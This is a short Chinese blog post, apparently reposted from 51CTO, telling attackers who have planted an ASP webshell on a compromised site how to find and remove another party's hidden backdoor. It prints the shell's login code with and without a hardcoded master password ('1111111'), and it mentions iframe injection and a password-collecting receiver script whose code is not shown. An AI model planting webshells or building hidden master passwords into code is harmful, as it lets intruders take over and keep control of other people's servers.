用简单的asp木马来找asp木马后门

2013 年 8 月 9 日6510

好不容易拿到个shell又被别人偷走了怎么甘心啊!所以在下完asp木马后要先检查有没后门,通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

IF requeSt.FoRM("pass")<>"" TheN

iF REquesT.foRM("pass")=uSERPASS Then

SEsSIoN("web2a2dmin")=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

IF requeSt.FoRM("pass")<>"" TheN

iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then

SEsSIoN("web2a2dmin")=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:

找到后删了,到此asp后门就算剔除了!

下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

以下是引用片段:

 (来源:51CTO)

0 0